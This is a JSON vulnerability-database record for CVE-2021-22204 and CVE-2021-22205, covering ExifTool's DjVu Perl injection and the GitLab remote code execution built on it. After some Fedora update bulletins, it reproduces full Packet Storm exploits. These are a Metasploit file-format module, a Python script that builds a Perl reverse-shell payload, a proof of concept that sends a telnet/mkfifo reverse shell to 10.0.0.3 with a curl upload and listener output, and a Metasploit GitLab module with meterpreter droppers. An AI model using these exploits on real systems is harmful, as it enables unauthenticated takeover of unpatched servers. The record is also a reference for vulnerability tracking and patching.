"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T00:54:11", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: perl-Image-ExifTool-12.16-3.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-05T00:54:11", "id": "FEDORA:DC90B309DE23", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/F6UOBPU3LSHAPRRJNISNVXZ5DSUIALLV/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "ExifTool is a Perl module with an included command-line application for reading and writing meta information in image, audio, and video files. It reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, and ID3 meta information from JPG, JP2, TIFF, GIF, PNG, MNG, JNG, MIFF, EPS, PS, AI, PDF, PSD, BMP, THM, CRW, CR2, MRW, NEF, PEF, ORF, DNG, and many other types of images. ExifTool also extracts information from the maker notes of many digital cameras by various manufacturers including Canon, Casio, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon, and Sony. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T01:04:48", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: perl-Image-ExifTool-12.16-3.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-05T01:04:48", "id": "FEDORA:E8F5F3053067", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DDKDLJLBTBBR66OOPXSXCG2PQRM5KCZL/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "ExifTool is a Perl module with an included command-line application for reading and writing meta information in image, audio, and video files. It reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, and ID3 meta information from JPG, JP2, TIFF, GIF, PNG, MNG, JNG, MIFF, EPS, PS, AI, PDF, PSD, BMP, THM, CRW, CR2, MRW, NEF, PEF, ORF, DNG, and many other types of images. ExifTool also extracts information from the maker notes of many digital cameras by various manufacturers including Canon, Casio, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon, and Sony. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T01:23:07", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: perl-Image-ExifTool-12.16-3.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-05T01:23:07", "id": "FEDORA:06290304CAE5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/U4RF6PJCJ6NQOVJJJF6HN6BORUQVIXY6/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-05-12T14:24:18", "description": "", "cvss3": {}, "published": "2021-05-12T00:00:00", "type": "packetstorm", "title": "ExifTool DjVu ANT Perl Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-12T00:00:00", "id": "PACKETSTORM:162558", "href": "https://packetstormsecurity.com/files/162558/ExifTool-DjVu-ANT-Perl-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ExifTool DjVu ANT Perl injection', \n'Description' => %q{ \nThis module exploits a Perl injection vulnerability in the DjVu ANT \nparsing code of ExifTool versions 7.44 through 12.23 inclusive. The \ninjection is used to execute a shell command using Perl backticks. \nThe DjVu image can be embedded in a wrapper image using the \nHasselbladExif EXIF field. \n}, \n'Author' => [ \n'William Bowling', # Vulnerability discovery \n'Justin Steven' # Metasploit module \n], \n'References' => [ \n%w[CVE 2021-22204], \n%w[URL https://twitter.com/wcbowling/status/1385803927321415687], \n%w[URL https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031], \n%w[URL https://www.openwall.com/lists/oss-security/2021/05/10/5] \n], \n'DisclosureDate' => '2021-05-24', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => false, \n'Payload' => { \n'DisableNops' => true, \n'Space' => 2000, \n'BadChars' => \"\\x22\\x24\\x40\\x60\\x5c\" # \", $, @, ` and \\ \n}, \n'Targets' => [ \n['JPEG file', { template: 'msf.jpg' }], \n['TIFF file', { template: 'msf.tif' }], \n['DjVu file', { template: 'msf.djvu' }] \n], \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('FILENAME', [true, 'Output file', 'msf.jpg']) \n]) \nend \n \ndef exploit \np = payload.encoded \n \nbuf = djvu_template.sub('echo vulnerable > /dev/tty', p) \nbuf[8, 4] = [209 + p.length].pack('L>') # Fix up DJVM length \nbuf[174, 4] = [43 + p.length].pack('L>') # Fix up DJVI length \nbuf[186, 4] = [31 + p.length].pack('L>') # Fix up ANTa length \n \nif target.name == 'JPEG file' \njpeg_buf = jpeg_template \njpeg_buf[86, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length) \nbuf = jpeg_buf \nelsif target.name == 'TIFF file' \ntif_buf = tif_template \ntif_buf[206, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length) \nbuf = tif_buf \nend \n \nfile_create(buf) \nend \n \ndef djvu_template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.djvu' \n)) \nend \n \ndef jpeg_template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.jpg' \n)) \nend \n \ndef tif_template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.tif' \n)) \nend \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162558/exiftool_djvu_ant_perl_injection.rb.txt"}, {"lastseen": "2022-05-11T16:48:38", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "packetstorm", "title": "ExifTool 12.23 Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-11T00:00:00", "id": "PACKETSTORM:167038", "href": "https://packetstormsecurity.com/files/167038/ExifTool-12.23-Arbitrary-Code-Execution.html", "sourceData": "`# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution \n# Date: 04/30/2022 \n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) \n# Vendor Homepage: https://exiftool.org/ \n# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip \n# Version: 7.44-12.23 \n# Tested on: ExifTool 12.23 (Debian) \n# CVE: CVE-2021-22204 \n# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204 \n# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image \n \n#!/usr/bin/env python3 \n \n# Imports \nimport base64 \nimport os \nimport subprocess \nimport sys \n \n# Class for colors \nclass color: \nred = '\\033[91m' \ngold = '\\033[93m' \nblue = '\\033[36m' \ngreen = '\\033[92m' \nno = '\\033[0m' \n \n# Print UNICORD ASCII Art \ndef UNICORD_ASCII(): \nprint(rf\"\"\" \n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} \n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\{color.no} \n{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} \n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no} \n\"\"\") \n \n# Print exploit help menu \ndef help(): \nprint(r\"\"\"UNICORD Exploit for CVE-2021-22204 \n \nUsage: \npython3 exploit-CVE-2021-22204.py -c <command> \npython3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> \npython3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>] \npython3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>] \npython3 exploit-CVE-2021-22204.py -h \n \nOptions: \n-c Custom command mode. Provide command to execute. \n-s Reverse shell mode. Provide local IP and port. \n-i Path to custom JPEG image. (Optional) \n-h Show this help menu. \n\"\"\") \n \n# Run the exploit \ndef exploit(command): \n \nUNICORD_ASCII() \n \n# Create perl payload \npayload = \"(metadata \\\"\\c${\" \npayload += command \npayload += \"};\\\")\" \n \nprint(f\"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}\") \nprint(f\"{color.red}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\") \n \n# Write payload to file \npayloadFile = open('payload','w') \npayloadFile.write(payload) \npayloadFile.close() \n \n# Bzz compress file \nsubprocess.run(['bzz', 'payload', 'payload.bzz']) \n \n# Run djvumake \nsubprocess.run(['djvumake', 'exploit.djvu', \"INFO=1,1\", 'BGjp=/dev/null', 'ANTz=payload.bzz']) \n \nif '-i' in sys.argv: \nimagePath = sys.argv[sys.argv.index('-i') + 1] \nsubprocess.run(['cp',f'{imagePath}','./image.jpg','-n']) \n \nelse: \n# Smallest possible JPEG \nimage = b\"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=\" \n \n# Write smallest possible JPEG image to file \nwith open(\"image.jpg\", \"wb\") as img: \nimg.write(base64.decodebytes(image)) \n \n# Write exiftool config to file \nconfig = (r\"\"\" \n%Image::ExifTool::UserDefined = ( \n'Image::ExifTool::Exif::Main' => { \n0xc51b => { \nName => 'HasselbladExif', \nWritable => 'string', \nWriteGroup => 'IFD0', \n}, \n}, \n); \n1; #end \n\"\"\") \nconfigFile = open('exiftool.config','w') \nconfigFile.write(config) \nconfigFile.close() \n \n# Exiftool config for output image \nsubprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q']) \n \n# Delete leftover files \nos.remove(\"payload\") \nos.remove(\"payload.bzz\") \nos.remove(\"exploit.djvu\") \nos.remove(\"exiftool.config\") \n \n# Print results \nprint(f\"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\\n\") \n \nexit() \n \nif __name__ == \"__main__\": \n \nargs = ['-h','-c','-s','-i'] \n \nif args[0] in sys.argv: \nhelp() \n \nelif args[1] in sys.argv and not args[2] in sys.argv: \nexec = sys.argv[sys.argv.index(args[1]) + 1] \ncommand = f\"system(\\'{exec}\\')\" \nexploit(command) \n \nelif args[2] in sys.argv and not args[1] in sys.argv: \nlocalIP = sys.argv[sys.argv.index(args[2]) + 1] \nlocalPort = sys.argv[sys.argv.index(args[2]) + 2] \ncommand = f\"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};\" \nexploit(command) \n \nelse: \nhelp() \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167038/exiftool1223-exec.txt"}, {"lastseen": "2021-11-17T17:16:06", "description": "", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-17T00:00:00", "type": "packetstorm", "title": "GitLab 13.10.2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-17T00:00:00", "id": "PACKETSTORM:164994", "href": "https://packetstormsecurity.com/files/164994/GitLab-13.10.2-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) \n# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 \n# Date: 11/01/2021 \n# Exploit Author: Jacob Baines \n# Vendor Homepage: https://about.gitlab.com/ \n# Software Link: https://gitlab.com/gitlab-org/gitlab \n# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8 \n# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu) \n# CVE : CVE-2021-22205 \n# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/ \n# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed \n \nCode execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it. \n \n1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270. \n \necho -e \n\"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=\" \n| base64 -d > lol.jpg \necho -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg \necho -n \n\"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==\" \n| base64 -d >> lol.jpg \n \n2. Sending the payload. Any random endpoint will do. \n \ncurl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8) \n \n2a. Sample Output from the reverse shell: \n \n$ nc -lnvp 1270 \nListening on [0.0.0.0] (family 0, port 1270) \nConnection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport \n34836) \nwhoami \ngit \nid \nuid=998(git) gid=998(git) groups=998(git) \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164994/gitlab13102reverse-exec.txt"}, {"lastseen": "2021-11-04T16:11:15", "description": "", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T00:00:00", "type": "packetstorm", "title": "GitLab Unauthenticated Remote ExifTool Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-04T00:00:00", "id": "PACKETSTORM:164768", "href": "https://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection', \n'Description' => %q{ \nThis module exploits an unauthenticated file upload and command \ninjection vulnerability in GitLab Community Edition (CE) and \nEnterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, \nand 13.8.8. \n \nExploitation will result in command execution as the git user. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'William Bowling', # Vulnerability discovery and CVE-2021-22204 PoC \n'jbaines-r7' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-22205' ], # GitLab \n[ 'CVE', '2021-22204' ], # ExifTool \n[ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ], \n[ 'URL', 'https://hackerone.com/reports/1154542' ], \n[ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ], \n[ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ] \n], \n'DisclosureDate' => '2021-04-14', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'Payload' => { \n'Space' => 290, \n'DisableNops' => true, \n'BadChars' => '#' \n}, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_openssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'wget', 'lwprequest', 'curl', 'printf' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef upload_file(file_data, timeout = 20) \nrandom_filename = \"#{rand_text_alphanumeric(6..12)}.jpg\" \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \nfile_data, \n'image/jpeg', \n'binary', \n\"form-data; name=\\\"file\\\"; filename=\\\"#{random_filename}\\\"\" \n) \n \nrandom_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12)) \nprint_status(\"Uploading #{random_filename} to #{random_uri}\") \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => random_uri, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n}, timeout) \nend \n \ndef check \n# Checks if the instance is a GitLab install by looking for the \n# 'About GitLab' footer or a password redirect. If that's successful \n# a bogus jpg image is uploaded to a bogus URI. The patched versions \n# should never send the bad image to ExifTool, resulting in a 404. \n# The unpatched versions should feed the image to the vulnerable \n# ExifTool, resulting in a 422 error message. \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/users/sign_in') \n}) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# handle two cases. First a normal install will respond with HTTP 200. \n# Second, if the root password hasn't been set yet then this will \n# redirect to the password reset page. \nunless (res.code == 200 && res.body.include?('>About GitLab<')) || \n(res.code == 302 && res.body.include?('/users/password/edit?reset_password_token')) \nreturn CheckCode::Safe('Not a GitLab web interface') \nend \n \nres = upload_file(rand_text_alphanumeric(6..32)) \nunless res \nreturn CheckCode::Detected('The target did not respond to the upload request.') \nend \n \ncase res.code \nwhen 422 \nif res.body.include?('The change you requested was rejected.') \nreturn CheckCode::Vulnerable('The error response indicates ExifTool was executed.') \nend \nwhen 404 \nif res.body.include?('The page could not be found') \nreturn CheckCode::Safe('The error response indicates ExifTool was not run.') \nend \nend \n \nreturn CheckCode::Detected \nend \n \ndef execute_command(cmd, _opts = {}) \n# printf needs all '\\' to be double escaped due to ExifTool parsing \nif cmd.start_with?('printf ') \ncmd = cmd.gsub('\\\\', '\\\\\\\\\\\\') \nend \n \n# header and trailer are taken from William Bowling's echo_vakzz.jpg from their original h1 disclosure. \n# The 'cmd' variable is sandwiched in a qx## function. \npayload_header = \"AT&TFORM\\x00\\x00\\x03\\xAFDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\"\\ \n\"\\x00\\xAC\\xFF\\xFF\\xDE\\xBF\\x99 !\\xC8\\x91N\\xEB\\f\\a\\x1F\\xD2\\xDA\\x88\\xE8k\\xE6D\\x0F,q\\x02\\xEEI\\xD3n\"\\ \n\"\\x95\\xBD\\xA2\\xC3\\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\b\\x00\\b\\x18\\x00d\\x00\\x16\\x00IN\"\\ \n\"CL\\x00\\x00\\x00\\x0Fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\b\\x00\\b\\x8A\\xE6\\xE1\"\\ \n\"\\xB17\\xD9\\x7F*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0F\\xF9\\x9FBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\"\\ \n\"\\x03\\aDJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\\"\\\\\\n\\\" . qx#\" \npayload_trailer = \"# . \\\\\\x0a\\\" b \\\") )\" + (' ' * 421) \n \nres = upload_file(payload_header + cmd + payload_trailer, 5) \n \n# Successful exploitation can result in no response (connection being held open by a reverse shell) \n# or, if the command executes immediately, a response with a 422. \nif res && res.code != 422 \nfail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\") \nend \n \nprint_good('Exploit successfully executed.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \n# payload is truncated by exiftool after 290 bytes. Because we need to \n# expand the printf flavor by a potential factor of 2, halve the linemax. \nexecute_cmdstager(linemax: 144) \nend \nend \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164768/gitlab_exif_rce.rb.txt"}], "suse": [{"lastseen": "2022-11-10T08:10:24", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for perl-Image-ExifTool fixes the following issues:\n\n Update to version 12.25 fixes (boo#1185547 CVE-2021-22204)\n\n * JPEG XL support is now official\n * Added read support for Medical Research Council (MRC) image files\n * Added ability to write a number of 3gp tags in video files\n * Added a new Sony PictureProfile value (thanks Jos Roost)\n * Added a new Sony LensType (thanks LibRaw)\n * Added a new Nikon LensID (thanks Niels Kristian 